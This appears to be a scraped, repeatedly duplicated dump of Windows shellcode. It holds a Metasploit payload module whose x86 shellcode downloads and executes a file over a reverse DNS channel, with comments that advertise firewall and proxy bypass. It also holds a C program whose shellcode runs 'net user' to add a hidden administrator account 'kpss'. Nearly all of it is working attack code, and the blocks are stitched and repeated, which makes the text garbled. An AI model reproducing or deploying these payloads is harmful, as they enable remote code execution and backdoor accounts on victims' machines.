'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# do not work in XP/2003 because thre are no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
download & execute file via reverse DNS channel
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# do not work in XP/2003 because thre are no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# do not work in XP/2003 because thre are no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
Add Admin Shellcode 112 bytes
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
Add Admin Shellcode 112 bytes
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
